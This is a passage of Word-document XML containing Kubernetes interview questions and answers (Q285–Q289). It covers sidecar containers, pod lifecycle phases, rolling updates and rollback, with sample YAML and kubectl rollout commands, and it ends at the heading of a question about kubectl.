        <w:t xml:space="preserve">      * Must succeed for Pod to become ready</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Init containers in Kubernetes are specialized containers that run sequentially before application containers in a Pod and must complete successfully, performing initialization tasks such as dependency checks, setup scripts, and configuration preparation before the main workload starts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q285. What are sidecar containers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A sidecar container in Kubernetes is a helper container that runs alongside the main application container inside the same Pod to provide supporting functionality.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A sidecar container enhances or extends the main application without changing its code.</w:t>
        <w:br/>
        <w:t>It runs continuously alongside the main container, not before it like an init container.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why sidecar containers are used</w:t>
        <w:br/>
        <w:t>They help offload common responsibilities such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Logging</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Proxying traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security handling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Configuration syncing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service mesh functions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Main container runs the application</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sidecar container runs helper logic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Both share:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Network namespace (same IP)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Storage volumes (if defined)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * They communicate via localhost or shared files</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common use cases</w:t>
        <w:br/>
        <w:t>1. Logging agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Collects logs from app and ships to ELK / CloudWatch</w:t>
        <w:br/>
        <w:t>2. Monitoring agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Exposes metrics (Prometheus exporter)</w:t>
        <w:br/>
        <w:t>3. Service mesh proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Example: Envoy proxy in Istio</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles traffic routing, retries, TLS</w:t>
        <w:br/>
        <w:t>4. Config sync</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Watches config changes and updates app files</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example YAML</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: app-with-sidecar</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  - name: log-agent</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: fluentd</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How communication happens</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Shared network: localhost</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Shared volumes: log files, configs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Inter-container communication is fast and secure</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Sidecar vs Init container</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Sidecar</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Init Container</w:t>
        <w:br/>
        <w:tab/>
        <w:t>When runs</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Along with app</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Before app starts</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lifecycle</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Continuous</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Finishes and exits</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Support runtime tasks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Setup tasks</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restart</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No (unless Pod restarts)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a car:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Main container = driver</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sidecar container = GPS, music system, or dashboard assistant</w:t>
        <w:br/>
        <w:t>They help the driver but are not the main function.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Runs in same Pod as application</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Shares networking and storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Always running with main container</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enhances functionality without modifying app code</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-world example (service mesh)</w:t>
        <w:br/>
        <w:t>In systems like Istio:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sidecar = Envoy proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Handles:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * traffic routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * retries</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * security (mTLS)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * observability</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A sidecar container in Kubernetes is a supporting container that runs alongside the main application container in the same Pod, sharing the same network and storage, and provides auxiliary functionalities such as logging, monitoring, proxying, or configuration management without modifying the main application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q286. Explain pod lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The Pod lifecycle in Kubernetes describes the phases a Pod goes through from creation to termination, including how it is scheduled, started, runs, and eventually removed.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A Pod is not permanent—it moves through defined states based on scheduling, container startup, health checks, and termination.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pod lifecycle phases</w:t>
        <w:br/>
        <w:t>1.</w:t>
        <w:br/>
        <w:t>Pending</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod is created but not yet running</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Waiting for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * scheduling on a node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * image pull</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * volume setup</w:t>
        <w:br/>
        <w:t>👉 Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Node not available</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Resource constraints</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2.</w:t>
        <w:br/>
        <w:t>Running</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod is scheduled to a node</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Containers are created and at least one is running</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * May still be initializing or not ready for traffic</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3.</w:t>
        <w:br/>
        <w:t>Succeeded</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * All containers finished successfully</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Common in Jobs or batch workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * No restart needed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4.</w:t>
        <w:br/>
        <w:t>Failed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * One or more containers terminated with errors</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Exit code indicates failure</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod will not restart successfully (depending on policy)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>5.</w:t>
        <w:br/>
        <w:t>Unknown</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes cannot determine Pod status</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Usually due to node communication issues</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pod lifecycle flow</w:t>
        <w:br/>
        <w:t>Pending → Running → (Succeeded | Failed)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Detailed lifecycle stages inside Running</w:t>
        <w:br/>
        <w:t>Once a Pod is Running, it goes through internal steps:</w:t>
        <w:br/>
        <w:t>1. Container creation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Images are pulled</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Init containers run (if any)</w:t>
        <w:br/>
        <w:t>2. Startup phase</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Startup probes (if configured) validate initialization</w:t>
        <w:br/>
        <w:t>3. Readiness phase</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Readiness probes decide if Pod can receive traffic</w:t>
        <w:br/>
        <w:t>4. Live state</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Liveness probes monitor health continuously</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pod termination process</w:t>
        <w:br/>
        <w:t>When a Pod is deleted:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. API server marks Pod for deletion</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Pod enters Terminating state</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. kubelet sends SIGTERM to containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Grace period starts</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. If not stopped → SIGKILL is sent</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Pod is removed from cluster</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key concepts affecting lifecycle</w:t>
        <w:br/>
        <w:t>1. Probes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Startup probe → controls startup validity</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Readiness probe → controls traffic routing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Liveness probe → controls restart</w:t>
        <w:br/>
        <w:t>2. Restart policy</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Always (default for Deployments)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * OnFailure</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Never</w:t>
        <w:br/>
        <w:t>3. Controllers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Deployment, ReplicaSet, Job manage Pod lifecycle</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a restaurant order:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pending → order placed, kitchen preparing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Running → food is being cooked</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ready → food is served</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Succeeded → meal completed successfully</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Failed → order burned/failed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Terminating → restaurant closing that order</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important behaviors</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pods are ephemeral (not permanent)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Controllers recreate Pods if needed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Lifecycle is managed automatically by Kubernetes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Pod lifecycle in Kubernetes is the sequence of states a Pod goes through—Pending, Running, Succeeded, Failed, or Unknown—from creation to termination, including initialization, readiness, health monitoring, and graceful shutdown managed by the Kubernetes control plane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q287. What is rolling update?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Rolling Update in Kubernetes is a deployment strategy that updates application instances gradually by replacing old Pods with new ones, without downtime.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Rolling update replaces Pods one by one (or in small batches) instead of stopping everything at once.</w:t>
        <w:br/>
        <w:t>This ensures the application remains available during deployment.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why rolling updates are used</w:t>
        <w:br/>
        <w:t>They help to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Avoid downtime during deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Gradually shift traffic to new version</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Detect issues early in production</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Enable safe, continuous delivery</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t>When you update a Deployment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Kubernetes creates new Pods with the updated version</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Old Pods are terminated gradually</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Traffic is shifted from old Pods to new Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Process continues until all old Pods are replaced</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rolling update flow</w:t>
        <w:br/>
        <w:t>Old Pods → gradually replaced → New Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Deployment strategy</w:t>
        <w:br/>
        <w:t>apiVersion: apps/v1</w:t>
        <w:br/>
        <w:t>kind: Deployment</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  replicas: 3</w:t>
        <w:br/>
        <w:t xml:space="preserve">  strategy:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    type: RollingUpdate</w:t>
        <w:br/>
        <w:t xml:space="preserve">    rollingUpdate:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      maxSurge: 1</w:t>
        <w:br/>
        <w:t xml:space="preserve">      maxUnavailable: 1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key parameters</w:t>
        <w:br/>
        <w:t>1. maxSurge</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Extra Pods allowed during update</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Example: 1 means 1 extra Pod can be created</w:t>
        <w:br/>
        <w:t>2. maxUnavailable</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Maximum Pods that can be unavailable during update</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Example: 1 means 1 Pod can be down</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example scenario</w:t>
        <w:br/>
        <w:t>You have:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * 3 replicas running (v1)</w:t>
        <w:br/>
        <w:t>You deploy v2:</w:t>
        <w:br/>
        <w:t>Step-by-step:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. 1 new Pod (v2) created</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. 1 old Pod (v1) terminated</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Repeat until all Pods are v2</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Zero downtime deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Safer production updates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Easy rollback if something fails</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Gradual traffic shifting</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rolling Update vs Recreate</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rolling Update</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Recreate</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Downtime</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deployment style</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Gradual</w:t>
        <w:br/>
        <w:tab/>
        <w:t>All at once</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Risk</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Production</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simple apps/testing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rollback support</w:t>
        <w:br/>
        <w:t>If new version fails:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes can roll back to previous ReplicaSet</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures stability and quick recovery</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a restaurant staff upgrade:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Instead of replacing all chefs at once (risking service failure)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * You replace one chef at a time while others continue working</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Managed by Deployment controller</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Works with ReplicaSets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Ensures continuous availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Supports automated scaling during updates</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>A rolling update in Kubernetes is a deployment strategy that incrementally replaces old Pods with new ones, ensuring zero downtime by gradually shifting traffic while maintaining application availability and allowing controlled scaling during the update process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q288. Explain rollback in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Rollback in Kubernetes is the process of reverting a Deployment to a previous stable version when a new deployment fails or causes issues.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Rollback = undo a bad deployment and restore the last working state.</w:t>
        <w:br/>
        <w:t>It ensures application stability by quickly going back to a known good version.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why rollback is needed</w:t>
        <w:br/>
        <w:t>During deployments, issues may occur such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Application crashes after update</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Bug in new version</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Performance degradation</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Configuration mistakes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Failed readiness/liveness probes</w:t>
        <w:br/>
        <w:t>Rollback helps to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Restore service quickly</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Minimize downtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Maintain reliability in production</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How rollback works</w:t>
        <w:br/>
        <w:t>Kubernetes uses ReplicaSets behind Deployments:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Each Deployment update creates a new ReplicaSet</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Old ReplicaSet is kept as history</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. If rollback is triggered:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes scales down new ReplicaSet</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scales up previous ReplicaSet</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Traffic shifts back to old version</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rollback flow</w:t>
        <w:br/>
        <w:t>v3 (bad) → rollback → v2 (stable)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Commands for rollback</w:t>
        <w:br/>
        <w:t>1. View rollout history</w:t>
        <w:br/>
        <w:t>kubectl rollout history deployment my-app</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Rollback to previous version</w:t>
        <w:br/>
        <w:t>kubectl rollout undo deployment my-app</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Rollback to specific revision</w:t>
        <w:br/>
        <w:t>kubectl rollout undo deployment my-app --to-revision=2</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Deployment history example</w:t>
        <w:br/>
        <w:t>Revision</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Version</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Status</w:t>
        <w:br/>
        <w:tab/>
        <w:t>1</w:t>
        <w:br/>
        <w:tab/>
        <w:t>v1</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>2</w:t>
        <w:br/>
        <w:tab/>
        <w:t>v2</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stable</w:t>
        <w:br/>
        <w:tab/>
        <w:t>3</w:t>
        <w:br/>
        <w:tab/>
        <w:t>v3</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Failed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rollback → revert to revision 2</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What Kubernetes preserves</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Previous ReplicaSets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Deployment revision history</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Pod templates of older versions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rollback vs Rolling Update</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rolling Update</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Rollback</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deploy new version</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Revert to old version</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Direction</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Forward</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Backward</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Trigger</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Update</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Failure/issue</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Effect</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Gradual replacement</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restore previous state</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Safety mechanism</w:t>
        <w:br/>
        <w:t>Rollback works because:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Kubernetes retains old ReplicaSets</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Traffic can be shifted instantly</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * No manual redeployment needed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of software updates on a phone:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rolling update = installing a new app version gradually</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rollback = uninstalling buggy update and reinstalling previous version</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Fast recovery from failures</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Zero or minimal downtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Simple recovery mechanism</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Built-in version history</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Rollback in Kubernetes is a feature of Deployments that allows reverting to a previous stable ReplicaSet version when a new deployment fails or causes issues, ensuring quick recovery and minimal downtime by restoring the last known good state of the application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q289. What is kubectl?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
